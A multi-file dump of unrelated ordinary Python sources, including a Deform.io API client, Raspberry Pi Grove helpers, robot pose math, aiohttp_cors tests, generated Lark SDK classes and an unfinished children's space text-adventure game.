'requests_request_url': (
'http://docs.python-requests.org/en/master/api/#requests.request'
)
}
class Client(object):
__doc__ = """Deform.io python client class.
Parameters:
* `host` - HTTP server host. E.g. `deform.io`.
* `port` - HTTP server port. Default is `None`.
* `secure` - if `True` client will make secure request via `https`.
Default is `True`.
* `requests_session` - python requests' [Session][requests-session]
instance. Default is `None`.
* `request_defaults` - python requests' [request][requests-request]
defaults. Default is `None`.
* `api_base_path` - HTTP server's api uri base path. Default is `/api/`.
Example:
```python
client = Client(host='deform.io')
```
[requests-session]: %(requests_session_url)s
[requests-request]: %(requests_request_url)s
""" % {
'requests_session_url': _DOCS_DATA['requests_session_url'],
'requests_request_url': _DOCS_DATA['requests_request_url'],
}
def __init__(self,
host,
port=None,
secure=True,
requests_session=None,
request_defaults=None,
api_base_path='/api/'):
self.host = host
self.port = port
self.secure = secure
self.requests_session = requests_session or requests.Session()
self.request_defaults = request_defaults
self.api_base_path = api_base_path
self.user = NonAuthUserResource(
base_uri=get_base_uri(
host=self.host,
port=self.port,
secure=self.secure,
api_base_path=self.api_base_path
),
auth_header=None,
requests_session=self.requests_session,
request_defaults=self.request_defaults
)
def auth(self, auth_type, auth_key, project_id=None):
"""Creates authenticated client.
Parameters:
* `auth_type` - Authentication type. Use `session` for auth
by session key. Use `token` for auth by token.
* `auth_key` - Authentication `session key` or `token`.
* `project_id` - Project identifier. Must be provided for
`token` authentication. Default is `None`.
Returns:
* Instance of [SessionAuthClient](#sessionauthclient) if
`auth_type` is `session`.
* Instance of [ProjectClient](#projectclient) if
`auth_type` is `token`
Raises:
* ValueError: if `project_id` parameter was not provided
Examples:
        For auth with `session` you should obtain a session key by
[Client.user.login](#clientuserlogin) providing
your account's email and password:
```python
client = Client(host='deform.io')
session_client = client.auth(
'session',
client.user.login(
email='[email protected]',
password='password'
),
)
        print(session_client)
<pydeform.client.SessionAuthClient object at 0x10c585650>
```
Authentication with `token` example:
```python
client = Client(host='deform.io')
token_client = client.auth(
'token',
auth_key='token-value',
project_id='some-project',
)
        print(token_client)
<pydeform.client.ProjectClient object at 0x11c585650>
```
"""
if auth_type == 'session':
return SessionAuthClient(
auth_header=get_session_http_auth_header(auth_key),
host=self.host,
port=self.port,
secure=self.secure,
requests_session=self.requests_session,
request_defaults=self.request_defaults,
api_base_path=self.api_base_path,
)
elif auth_type == 'token':
if not project_id:
msg = 'You should provide project_id for token authentication'
raise ValueError(msg)
return ProjectClient(
base_uri=get_base_uri(
project=project_id,
host=self.host,
port=self.port,
secure=self.secure,
api_base_path=self.api_base_path
),
auth_header=get_token_http_auth_header(auth_key),
requests_session=self.requests_session,
request_defaults=self.request_defaults,
)
class SessionAuthClient(object):
"""Session auth client.
    You should not initialize this client manually.
Use [Client.auth](#clientauth) method with ``session`` authentication.
"""
def __init__(self,
auth_header,
host,
port,
secure,
requests_session,
request_defaults,
api_base_path):
self.host = host
self.port = port
self.secure = secure
self.requests_session = requests_session
self.request_defaults = request_defaults
self.auth_header = auth_header
self.api_base_path = api_base_path
self.base_uri = get_base_uri(
host=self.host,
port=self.port,
secure=self.secure,
api_base_path=self.api_base_path
)
resource_kwargs = {
'base_uri': self.base_uri,
'auth_header': auth_header,
'requests_session': requests_session,
'request_defaults': request_defaults
}
self.user = SessionUserResource(**resource_kwargs)
self.projects = ProjectListResource(**resource_kwargs)
self.project = ProjectOneResource(**resource_kwargs)
def use_project(self, project_id):
"""Creates an instance of [ProjectClient](#projectclient),
providing session authentication.
Parameters:
* `project_id` - project identifier.
Returns:
Instance of [ProjectClient](#projectclient) with
session authentication.
Example:
```python
client = Client('deform.io')
session_client = client.auth(
'session',
client.user.login('[email protected]', 'password')
)
session_client.use_project('some-project-id')
```
"""
return ProjectClient(
base_uri=get_base_uri(
project=project_id,
host=self.host,
port=self.port,
secure=self.secure,
api_base_path=self.api_base_path
),
auth_header=self.auth_header,
requests_session=self.requests_session,
request_defaults=self.request_defaults,
)
class ProjectClient(object):
"""Project client.
    You should not initialize this client manually.
Use [Client.auth](#clientauth) method with ``token`` authentication or
[SessionAuthClient.use_project](#sessionauthclientuse_project) method.
"""
def __init__(self,
base_uri,
auth_header,
requests_session,
request_defaults):
resource_kwargs = {
'base_uri': base_uri,
'auth_header': auth_header,
'requests_session': requests_session,
'request_defaults': request_defaults
}
self.base_uri = base_uri
self.auth_header = auth_header
        self.requests_session = requests_session
self.request_defaults = request_defaults
self.info = CurrentProjectInfoResource(**resource_kwargs)
self.collections = CollectionListResource(**resource_kwargs)
self.collection = CollectionOneResource(**resource_kwargs)
self.documents = DocumentListResource(**resource_kwargs)
self.document = DocumentOneResource(**resource_kwargs)
|
from typing import List
from .action_postprocessor import ActionPostprocessor
from ..actions import Action
class PostprocessorCombiner(ActionPostprocessor):
"""
Combines multiple other postprocessors
"""
def __init__(self, postprocessors: List[ActionPostprocessor]):
self.postprocessors = postprocessors
def postprocess(self, actions: List[Action]) -> List[Action]:
for p in self.postprocessors:
actions = p.postprocess(actions)
return actions
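# The postprocessors are applied in list order, each consuming the output of
# the previous one. A sketch with hypothetical postprocessor classes:
#
#     combined = PostprocessorCombiner([DeduplicateActions(), SortActions()])
#     actions = combined.postprocess(actions)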
|
# Minimum Height Triangle
# Find the smallest height of a triangle preserving the given constraints.
#
# https://www.hackerrank.com/challenges/lowest-triangle/problem
#
base, area = map(int, input().split())
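# area = base * height / 2, so the answer is ceil(2 * area / base);
# (n - 1) // d + 1 is the integer ceiling-division idiom for positive n.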
height = (2 * area - 1) // base + 1
print(height)
|
#!/usr/bin/env python
#
# This is the library for Grove Base Hat.
#
# Helper Classes
#
'''
## License
The MIT License (MIT)
Grove Base Hat for the Raspberry Pi, used to connect grove sensors.
Copyright (C) 2018 Seeed Technology Co.,Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
from __future__ import print_function
from grove.adc import *
import time
import sys
import os
import re
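# Map usable pin numbers to the silkscreen slot labels of each Base Hat
# variant; the Pi Zero hat exposes only a subset of the full-size hat's slots.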
_SlotsGPIORpi = { 5:"D5", 12:"PWM", 16:"D16", 18:"D18", 22:"D22", 24:"D24", 26:"D26" }
_SlotsGPIORpiZero = { 5:"D5", 12:"PWM", 16:"D16" }
_SlotsADCRpi = { 0:"A0", 2:"A2", 4:"A4", 6:"A6" }
_SlotsADCRpiZero = { 0:"A0", 2:"A2", 4:"A4" }
_SlotsPWMRpi = { 12:"PWM", 18:"D18" }
_SlotsPWMRpiZero = { 12:"PWM" }
_SlotsNull = { }
class SlotHelper(object):
# Slot types
GPIO = 0
ADC = 1
PWM = 2
I2C = 3
UART = 4
def __init__(self, slot):
adc = ADC()
name = adc.name
print("Hat Name = '{}'".format(name))
if name == RPI_ZERO_HAT_NAME:
self.__hat_type = RPI_ZERO_HAT_PID
self.__slots_gpio = _SlotsGPIORpiZero
self.__slots_adc = _SlotsADCRpiZero
self.__slots_pwm = _SlotsPWMRpiZero
        else:
            if name != RPI_HAT_NAME:
                print("Unknown hat, assume {}".format(RPI_HAT_NAME))
            self.__hat_type = RPI_HAT_PID
            self.__slots_gpio = _SlotsGPIORpi
            self.__slots_adc = _SlotsADCRpi
            self.__slots_pwm = _SlotsPWMRpi
self.__slots_i2c = _SlotsNull
maps = { \
SlotHelper.GPIO:self.__slots_gpio, \
SlotHelper.ADC :self.__slots_adc, \
SlotHelper.PWM :self.__slots_pwm, \
SlotHelper.I2C :self.__slots_i2c, \
}
self._slots = maps.get(slot)
self._slot = slot
def is_adapted(self, pin):
if not self._slots:
return False
        if pin not in self._slots:
return False
return True
def list_avail(self):
if not self._slots:
return
maps = { \
SlotHelper.GPIO: "GPIO", \
SlotHelper.ADC : "ADC", \
SlotHelper.PWM : "PWM", \
SlotHelper.I2C : "I2C", \
}
print(" <pin> could be one of below values")
print(" in the pin column for {} function".format(maps.get(self._slot)))
print(" And connect the device to corresponding slot")
print("==============")
print(" pin | slot")
print("==============")
for pin, slot in self._slots.items():
print('{:^5}|{:^5} '.format(pin, slot))
def argv2pin(self, extra=''):
if len(sys.argv) < 2:
usage = 'Usage: {} <pin>'.format(sys.argv[0])
usage += extra
print(usage)
self.list_avail()
sys.exit(1)
pin = int(sys.argv[1])
if not self.is_adapted(pin):
self.list_avail()
sys.exit(1)
return pin
def root_check():
if os.geteuid() != 0:
print("This program must be run as root.")
print("sudo required for non-root user, Aborting.")
sys.exit(1)
def __module_installed(name):
for line in os.popen("lsmod"):
match = re.match("^" + name + " *", line)
if match is None: continue
# print("result = {}".format(match))
return True
return False
def module_install(name, param):
if __module_installed(name):
return True
os.system("modprobe " + name + " " + param)
for _ in range(20):
if __module_installed(name):
return True
time.sleep(0.2)
return False
class OverlayHelper(object):
def __init__(self, dev_path, overlay, param):
self._path = dev_path
self._ovlay = overlay
self._param = param
def __is_dt_inst(self):
for line in os.popen("dtoverlay -l"):
# lines likes
#2: w1-gpio gpiopin=5
match = re.match("^[0-9]+: *" + self._ovlay + " +", line)
if match is None: continue
return True
return False
def is_installed(self):
if os.path.exists(self._path):
return True
if self.__is_dt_inst():
return True
return False
def install(self):
if self.is_installed():
return True
os.system("dtoverlay " + self._ovlay + " " + self._param)
for _ in range(20):
if self.is_installed():
return True
time.sleep(0.2)
return False
def __str__(self):
return "Overlay {} installed = {}".format(
self._ovlay, self.is_installed())
# __repr__ = __str__
@property
def name(self):
return self._ovlay
if __name__ == '__main__':
print("module w1_therm installed: {}"
.format(__module_installed("w1_therm")))
module_install("w1_therm", "")
print("module w1_therm installed: {}"
.format(__module_installed("w1_therm")))
print("module w1_gpio installed: {}"
.format(__module_installed("w1_gpio")))
oh = OverlayHelper("/sys/devices/w1_bus_master1",
"w1-gpio",
"gpiopin=5")
print(oh)
print("install {} ...".format(oh.name))
oh.install()
print(oh)
|
#!/usr/bin/python
from axis_fifo import AXIS_FIFO
from devices import fifo_devices
import struct
def writeToDDS(dds_char_dev, address, data):
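    # Pack the 32-bit register value little-endian, then queue the transfer
    # byte by byte: the high half (D16-D31) preceded by an instruction byte
    # (address + 0x80), then the low half (D0-D15) preceded by a 0xC1 control
    # byte that this design appears to use as the IO-update strobe.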
data_bytes = struct.pack('<I', data)
words = []
    # instruction and D16-D31
    words.append(data_bytes[2:3])
    words.append(data_bytes[3:4])
    words.append(struct.pack('<B', address + 128))
    words.append(b"\x00")
    # IOU and D0-D15
    words.append(data_bytes[0:1])
    words.append(data_bytes[1:2])
    words.append(struct.pack('<B', 192 + 1))
    words.append(b"\x00")
for word in words:
dds_char_dev.write(word)
if __name__ == "__main__":
# device = fifo_devices['AD9959_0']
# fifo = AXIS_FIFO(device)
# fifo.write_axis_fifo("\x00\x86\x28\xF5") #(76.45 MHZ: 0x271DE698) (80 MHz: 0x28F5C378)
# fifo.write_axis_fifo("\x00\xC1\xC3\x78")
with open("/dev/axis_fifo_0x0000000080005000", "r+b") as character:
# ~ writeWords(character)
        writeToDDS(character, 6, 0x00011100)
|
import pandas
import os
from desafio_iafront.data.saving import save_partitioned
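# The frame is written twice with opposite partition orders (date-first and
# cluster-first) so it can be read efficiently by either access pattern.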
def save_clustered_data(dataset: pandas.DataFrame, saida: str):
date_first = os.path.join(saida, 'date_first')
cluster_first = os.path.join(saida, 'cluster_first')
save_partitioned(dataset, date_first, ['data', 'hora', 'cluster_label'])
save_partitioned(dataset, cluster_first, ['cluster_label', 'data', 'hora']) |
import math
import numpy as np
# Converts URx's rotation vector into a rotation matrix
#
# I did not derive this nor do I fully understand the maths behind this :0
# I took it from: https://dof.robotiq.com/discussion/1648/around-which-axes-are-the-rotation-vector-angles-defined
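#
# It is the standard axis-angle (Rodrigues) form: with theta = |r| and unit
# axis u = r/theta, R = c*I + s*[u]_x + C*(u u^T), where c = cos(theta),
# s = sin(theta), C = 1 - c, and [u]_x is the skew-symmetric cross-product
# matrix of u.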
def convert_tool_pose_to_transformation_matrix(tool_pose):
r = tool_pose[3:]
rx = r[0]
ry = r[1]
rz = r[2]
theta = math.sqrt( (rx ** 2) + (ry ** 2) + (rz ** 2) )
ux = rx / theta
uy = ry / theta
uz = rz / theta
c = math.cos(theta)
s = math.sin(theta)
C = 1 - c
# base_to_tcp = np.array([0, -600, -135])
base_to_tcp = tool_pose[:3]
T = np.array([
[(ux * ux * C) + c , (ux * uy * C) - (uz * s), (ux * uz * C) + (uy * s), base_to_tcp[0]],
[(uy * ux * C) + (uz * s), (uy * uy * C) + c , (uy * uz * C) - (ux * s), base_to_tcp[1]],
[(uz * ux * C) - (uy * s), (uz * uy * C) + (ux * s), (uz * uz * C) + c , base_to_tcp[2]],
[0,0,0,1]
])
return T
# Calculates hand position in absolute coordinates
def calculate_hand_position(transformation_matrix, relative_palm_postion):
    # Formats raw hand coordinates and appends the homogeneous coordinate
    hand_coordinates_raw = list(relative_palm_postion)
    # hand_coordinates_raw = [50, 0, 0]  # debug override, left disabled
    hand_coordinates_raw.append(1)
    # Flip y: the sensor and robot frames appear to use opposite y conventions
    hand_coordinates = np.array(hand_coordinates_raw) * [1, -1, 1, 1]
    # Gets the absolute position via transformation-matrix multiplication
absolute_position = transformation_matrix.dot(hand_coordinates)
return np.round(absolute_position[:3],3)
def calculate_required_robot_position(absolute_hand_position, y_offset=0):
required_robot_position = absolute_hand_position + [0, 130, 0]
# required_robot_position = absolute_hand_position + y_offset
return required_robot_position
def main():
tool_pose = [50, -600, -135, 0, 3.14, 0]
T = convert_tool_pose_to_transformation_matrix(tool_pose)
relative_palm_postion = [0, 103, 0]
absolute_hand_position = calculate_hand_position(T, relative_palm_postion)
print(absolute_hand_position)
required_robot_position = calculate_required_robot_position(absolute_hand_position)
print(required_robot_position)
if __name__ == "__main__":
    main()
|
""" Create a python file that collects the necessary information and prints json:
```python
#! /usr/bin/env python
from exdoc import doc
import json
from project import User
print(json.dumps({
    'user': doc(User),
}))
```
And then use its output:
```console
./collect.py | j2 --format=json README.md.j2
```
"""
from .py import doc, getmembers, subclasses
|
"""Wrap the sklearn.linear_model ridge classification model."""
from model_base import ClassificationModelBase
from sklearn.linear_model import RidgeClassifier
class RidgeClassifierModel(ClassificationModelBase):
def __init__(self, model_conf):
model = RidgeClassifier()
super().__init__(model_conf, model)
def get_params(self):
parameters = {}
parameters['alpha'] = self.fetch_parameter('alpha', float, True)
parameters['tol'] = self.fetch_parameter('tol', float, True)
parameters['solver'] = self.fetch_parameter('solver', str, True)
parameters['max_iter'] = self.fetch_parameter('max_iter', int, True)
return parameters
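# A minimal usage sketch; the exact shape of `model_conf` and the semantics of
# `fetch_parameter` come from ClassificationModelBase and are assumed here:
#     conf = {'alpha': 1.0, 'tol': 0.001, 'solver': 'auto', 'max_iter': 1000}
#     model = RidgeClassifierModel(conf)
#     params = model.get_params()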
|
# Copyright 2015 Vladimir Rutsky <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""aiohttp_cors.cors_config unit tests.
"""
import pytest
from aiohttp import web
from aiohttp_cors import CorsConfig, ResourceOptions, CorsViewMixin
async def _handler(request):
return web.Response(text="Done")
class _View(web.View, CorsViewMixin):
    async def get(self):
        return web.Response(text="Done")
@pytest.fixture
def app():
return web.Application()
@pytest.fixture
def cors(app):
return CorsConfig(app, defaults={
"*": ResourceOptions()
})
@pytest.fixture
def get_route(app):
return app.router.add_route(
"GET", "/get_path", _handler)
@pytest.fixture
def options_route(app):
return app.router.add_route(
"OPTIONS", "/options_path", _handler)
def test_add_options_route(app, cors, options_route):
"""Test configuring OPTIONS route"""
with pytest.raises(ValueError,
match="already has OPTIONS handler"):
cors.add(options_route.resource)
def test_plain_named_route(app, cors):
"""Test adding plain named route."""
# Adding CORS routes should not introduce new named routes.
assert len(app.router.keys()) == 0
    route = app.router.add_route(
        "GET", "/plain_path", _handler, name="plain_named_route")
assert len(app.router.keys()) == 1
cors.add(route)
assert len(app.router.keys()) == 1
def test_dynamic_named_route(app, cors):
"""Test adding dynamic named route."""
assert len(app.router.keys()) == 0
route = app.router.add_route(
"GET", "/{name}", _handler, name="dynamic_named_route")
assert len(app.router.keys()) == 1
cors.add(route)
assert len(app.router.keys()) == 1
def test_static_named_route(app, cors):
"""Test adding dynamic named route."""
assert len(app.router.keys()) == 0
route = app.router.add_static(
"/file", "/", name="dynamic_named_route")
assert len(app.router.keys()) == 1
cors.add(route)
assert len(app.router.keys()) == 1
def test_static_resource(app, cors):
"""Test adding static resource."""
assert len(app.router.keys()) == 0
app.router.add_static(
"/file", "/", name="dynamic_named_route")
assert len(app.router.keys()) == 1
for resource in list(app.router.resources()):
if isinstance(resource, web.StaticResource):
cors.add(resource)
assert len(app.router.keys()) == 1
def test_web_view_resource(app, cors):
"""Test adding resource with web.View as handler"""
assert len(app.router.keys()) == 0
route = app.router.add_route(
"GET", "/{name}", _View, name="dynamic_named_route")
assert len(app.router.keys()) == 1
cors.add(route)
assert len(app.router.keys()) == 1
def test_web_view_warning(app, cors):
"""Test adding resource with web.View as handler"""
route = app.router.add_route("*", "/", _View)
with pytest.warns(DeprecationWarning):
cors.add(route, webview=True)
def test_disable_bare_view(app, cors):
class View(web.View):
pass
route = app.router.add_route("*", "/", View)
with pytest.raises(ValueError):
cors.add(route)
|
# Code generated by lark_sdk_gen. DO NOT EDIT.
from pylark.lark_request import RawRequestReq, _new_method_option
from pylark import lark_type, lark_type_sheet, lark_type_approval
import attr
import typing
import io
@attr.s
class CopyDriveFileReq(object):
file_token: str = attr.ib(
default="", metadata={"req_type": "path", "key": "fileToken"}
    ) # Token of the source file or document to copy; see [Overview](https://open.feishu.cn/document/ukTMukTMukTM/uUDN04SN0QjL1QDN/files/guide/introduction) for how to obtain it
type: str = attr.ib(
default="", metadata={"req_type": "json", "key": "type"}
    ) # Type of document to create: "doc", "sheet" or "bitable"
dst_folder_token: str = attr.ib(
default="", metadata={"req_type": "json", "key": "dstFolderToken"}
    ) # Token of the destination folder; see [Overview](https://open.feishu.cn/document/ukTMukTMukTM/uUDN04SN0QjL1QDN/files/guide/introduction) for how to obtain it
dst_name: str = attr.ib(
default="", metadata={"req_type": "json", "key": "dstName"}
    ) # New name for the copied file
comment_needed: bool = attr.ib(
default=None, metadata={"req_type": "json", "key": "commentNeeded"}
    ) # Whether to copy comments
@attr.s
class CopyDriveFileResp(object):
folder_token: str = attr.ib(
default="", metadata={"req_type": "json", "key": "folderToken"}
) # 目标文件夹的 token
revision: int = attr.ib(
default=0, metadata={"req_type": "json", "key": "revision"}
) # 新创建文档的版本号
token: str = attr.ib(
default="", metadata={"req_type": "json", "key": "token"}
) # 新创建文档的 token
type: str = attr.ib(
default="", metadata={"req_type": "json", "key": "type"}
    ) # Type of the new document: "doc" or "sheet"
url: str = attr.ib(
default="", metadata={"req_type": "json", "key": "url"}
    ) # URL of the newly created document
def _gen_copy_drive_file_req(request, options) -> RawRequestReq:
return RawRequestReq(
dataclass=CopyDriveFileResp,
scope="Drive",
api="CopyDriveFile",
method="POST",
url="https://open.feishu.cn/open-apis/drive/explorer/v2/file/copy/files/:fileToken",
body=request,
method_option=_new_method_option(options),
need_tenant_access_token=True,
need_user_access_token=True,
)
|
from time import sleep
import random
from os import system, name
import urllib.request
import json
item = []
money = 0
print('''
_____ ____ ____ __ ___ ______ ____ ____ ____ _
/ ___/| \ / | / ] / _] | || \ / || || |
( \_ | o ) o | / / / [_ | || D )| o | | | | |
\__ || _/| |/ / | _] |_| |_|| / | | | | | |___
/ \ || | | _ / \_ | [_ | | | \ | _ | | | | |
\ || | | | \ || | | | | . \| | | | | | |
\___||__| |__|__|\____||_____| |__| |__|\_||__|__||____||_____|
''')
def intro(item,money):
print("One day, Isabel was tired of being a silent space and time travelling mime.")
sleep(2)
print("So, she went for a walk, out on the space platform, on star station Old Victoria,")
sleep(2)
print("and while walking, and floating down the space platform,")
sleep(2)
print("she found a newspaper! A real, old Earth, newspaper! Oh my, tut tut and chip chip doodle!")
sleep(3)
print("The newspaper looks old and magical, do you want to take it?\n")
print("You can also play trivia by pressing [t]")
choice = input("Do you take thy newspaper to readth with thine eyes? y/n ")
sleep(2)
if choice == 'y':
print("You take the newspaper and stick it in your space sachel\n")
item.append("newspaper")
sleep(2)
elif choice == 't':
trivia(item,money)
else:
print("You decide its best not to take that old Earth rag and keep on walking by\n")
item.append("nothing")
sleep(2)
sam(item, money)
def sam(item,money):
print("You are stopped by a space cop, who asks what you have in your sachel")
sleep(2)
print("You open the sachel to show the space cop you have a whole lot of",item[0],"\n")
sleep(2)
if item[0] == 'newspaper':
print("The Space Cop, who's name is Sam, wants to buy the newspaper for 500 space credits")
sleep(2)
print(f"For your information, one space credit is 620 human dollars, which gives you ${500*620}\n")
sleep(2)
choice = input("Do you want to sell your newspaper to Sam? y/n ")
if choice == 'y':
print("You sell Sam the newspaper")
money += 500
item[0] = 'nothing'
else:
print("you dont sell the paper and Sam walks away dejected.\n")
sleep(2)
print("You wonder why someone would pay so much for something so ordinary\n")
sleep(2)
print("You look in your space sachel, and now have a whole lot of",item[0])
sleep(2)
print(f"Checking your bank account at Zegumungs, you have {money} space credits\n")
sleep(3)
else:
print("The Space Cop sighs and keeps walking")
sleep(10)
clear()
print("\n\n")
clear()
spacies(item, money)
def spacies(item,money):
print('''
___
| | |
/ \ | | Welcome to Spacies, the Macys of Space
|--o|===|-|
|---| |d|
/ \ |w| How can I help on this spacy afternoon?
| U | |b|
| S |=| |
| A | | | You can buy four things here
|_______| |_| 1. Space Bob Ross wigs - 250 SC
|@| |@| | | 2. Zero gravity carrots - 10 SC
___________|_|_ 3. One small package of gravity (1G) - 1 SC
4. A talking space potato - 1.5 SC
''')
print("\n\n")
choice = input("What do you want to buy? 0 to quit ")
choice = int(choice)
if choice == 1:
if money > 250:
sleep(2)
print("You buy the best wig on the space station")
sleep(2)
print("While you dont like it, you want to keep your friends, and stay a fashion icon")
item.append("bob ross wig")
money -= 250
sleep(2)
            print(f'You now have {item[-1]} and {money} space credits, which is ${money*620}')
sleep(2)
else:
print("You cant buy anything, youre broke")
elif (choice == 2) and (money > 0):
print("You buy a package of zero gravity carrots")
sleep(2)
print("Space carrots are hard to eat in zero gravity, but you manage")
sleep(2)
print("It seems to all work out, even though there are now but of orange floating around the station")
sleep(2)
print("Refreshed by the delicous snack, you continue on your adventure")
money -= 10
        print(f'You now have {item[-1]} and {money} space credits, which is ${money*620}')
sleep(2)
elif (choice == 3) and (money > 0):
print("You buy a small package of gravity")
sleep(2)
print("You feel slightly heavier, the gravity seems to be working")
sleep(2)
print("Gravity will help with your mime abilities, but you may need more to time travel")
sleep(2)
print("Dimensional travel is possible though... you may consider it...")
money -= 1
        print(f'You now have {item[-1]} and {money} space credits, which is ${money*620}')
sleep(2)
elif (choice == 4) and (money > 0):
print("You buy a talking space potato")
sleep(2)
print("His name is Bill, and he is a potato. He is very annoying and screams all the time")
sleep(2)
print("You scream things like 'Do you want to be a baked potato?' and 'Quiet or I mash you'")
sleep(2)
print("But it does not seem to help and the screaming continues ")
money -= 1.5
        print(f'You now have {item[-1]} and {money} space credits, which is ${money*620}')
sleep(2)
else:
print("You decide not to buy anything")
option = input("Do you want to buy anything else?")
if option == 'y':
spacies(item,money)
option = input('You see a mime room, do you want to enter it?')
if option == 'y':
mime(item,money)
else:
dimensional(item,money)
print("\n\n")
sleep(4)
def dimensional(item,money):
print('''
You approach a big sign that says:
Welcome to the dimensional portal - fun to teleport to other dimensions
There is also a small sign that says "Caution: Some Danger may Apply"
. + . . . . . .
. . . *
. * . . . . . . + .
"You Are Here" . . + . . .
. | . . . . . .
| . . . +. + .
\|/ . . . .
. . V . * . . . . + .
+ . . . +
. . + .+. .
. . . + . . . . .
. . . . . . . . ! /
* . . . + . . - O -
. . . + . . * . . / |
. + . . . .. + .
. . . . * . * . +.. . *
. . . . . . . . + . . +
''')
sleep(2)
print("Would you like to use the dimensional transporter?")
sleep(2)
choice = input(f"The transporter costs 1 SC ($620). Are you interested? y/n ")
if choice == 'y':
if money > 0:
print("you decide to try the transporter")
sleep(2)
else:
print("you dont have any money, but they do need mimes on Zergalon Alpha")
sleep(2)
print("they let you get on the transporter")
sleep(2)
else:
print("While you dont want to go, it seems like you are forced to anyways")
sleep(2)
zerg(item, money)
def zerg(item,money):
print("You step on the transporter, and you are zapped to another dimension")
print('''
____ _ _ _ _
|_ /___ _ _ __ _ __ _| |___ _ _ /_\ | |_ __| |_ __ _
/ // -_) '_/ _` / _` | / _ \ ' \ / _ \| | '_ \ ' \/ _` |
/___\___|_| \__, \__,_|_\___/_||_| /_/ \_\_| .__/_||_\__,_|
__ __|___/ __ |_| _
\ \ / /__| |__ ___ _ __ ___ ___ \ \ / /__ _ _| |
\ \/\/ / -_) / _/ _ \ ' \/ -_|_-< \ V / _ \ || |_|
\_/\_/\___|_\__\___/_|_|_\___/__/ |_|\___/\_,_(_)
''')
def mime(item,money):
print("You enter the mime room, look around, and see cupcakes.\n'Tis surprising. They are mint toothpaste. \nYou shudder in disgust, you have a strange feeling you might not like mint toothpaste.")
sleep(2)
choice = input("Would you like to buy a disgusting minttoothpaste cupcake? ")
if (choice == 'y') and (money > 0):
print("You buy a cupcake and do not enjoy it because it is mint toothpaste. Mint Toothpaste tastes like mosquitos.")
else:
print("You dont have any money to buy the mint toothpaste cupcake.")
spacies(item, money)
def clear():
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def nothing_room(item, money):
print("You walk through a plain white door in a mysterious and extremely dark hallway. You're not even sure it was white.")
sleep(2)
print("You are in a very dark room with nothing. LITERALLY nothing.")
sleep(2)
print("Or are youuuuu?")
sleep(2)
print("a creepy guy comes out.")
sleep(2)
print("he says 'hello, human.'And you are just confused because you are obviously a space and time traveling mime.")
sleep(2)
print("he says 'Would you like a vegetable?' You can now see that he is blind.")
sleep(2)
print("He magicly pulls out a variety of vegetables.")
sleep(2)
choice = input("Would you like a vegetable? They are magic and will grow in your stomach. y/n ")
if (choice == 'y') and (money > 0):
print("You snatch a vegetable and realize you do not have to pay for it because he is old and blind and will not notice you took a his purple carrot. You know this is mean of you, but you enjoy purple carrots.")
sleep (2)
print("You flee the room swiftly, and once you're out of the old man's earshot, you take a bite out of your purple carrot.")
sleep(2)
print("You hate it. It's mint toothpaste! How dare that WITCH...")
sleep(2)
print("You've been fooled. Tricked. And quite possibly, bamboozled.")
sleep(2)
else:
print("You don't want a vegetable. They might be mint toothpaste and you don't want to waste any money.")
sleep(2)
print("You walk out of the room sighing and saying 'Nah.'")
def learning(item,money):
print("You enter the learning rooms. After looking around you find a spellbook on the floor. ")
sleep(2)
choice = input("Would you like to pick it up? ")
    if choice == 'y':
        print("You attempt to pick up the book, but to pick it up you must roll at least 15 on a luck check")
        input("Press enter to roll")
        d20 = random.randint(1,20)
        print(d20)
        if d20 > 14:
            print("You take the book, putting it into your satchel unscathed")
        else:
            print("The book vanishes in your hands, never being seen again")
    else:
        print("You leave the book on the floor")
    spacies(item, money)
def chicken(item,money):
    sleep(2)
print("You drive over in your fancy space car to McSpacedonalds.")
choice = input("Would you like to buy [a] a Space Mac or [b] a Buttermilk Space chicken sandwich")
order_name = input("What is the name of the order")
if choice == "a":
print("Yeet")
def dog(item,money):
print("You enter the dog room, when you look around there are a few things that you see, you see a mean lookin chicken, and a few dogs in cages! One is a cute french bulldog")
sleep(2)
choice = input("Would you like to buy the cute frenchie?? ")
if (choice == 'y') and (money > 0):
print("You buy the frenchy and it bites the chickens head off as you walk past.")
else:
print("Why dont you have any money???")
spacies(item, money)
def spacefarm(item,money):
print("You find yourself in a room full of cows, pigs, sheep and goats.")
sleep(2)
print("The smell is terrible, but you don't notice very much because you've been stuck with gross people on the same space station for months.")
sleep(2)
print("As you make your way through the room, you notice a little goat eating hay in the corner.")
choice = input("Would you like to steal the goat? He is VERY cute...")
if (choice == 'y') and (money > 0):
print("You stuff the goat in your backpack and make a run for it.")
else:
print("You probably don't want a goat anyway. They make funny noises and eat furniture.")
spacies(item, money)
def fight(item,money):
print("You enter the fighting room, you see there are all kinds of swords\n but only one seems to get your attention,\n it is all steel with a red handle.")
sleep(2)
print("you go up to examine the sword and the cool metal makes you feel alive.")
sleep(2)
choice = input("Would you like to buy the sword for 50 space credits?")
if (choice == 'y') and (money > 49):
money -= 50
print("You buy the sword and and leave the room thinking that if you get attacked you can fight back")
else:
print("You decide that having a sword around will draw suspicion to you so leave the room empty handed.")
spacies(item, money)
def kill(item,money):
print("You see a man who has just beaten up an elderly woman, do you either hit A, and kill the man, or do you quietly tell him to stop")
choice = input("What do you choose? ")
if choice == "A":
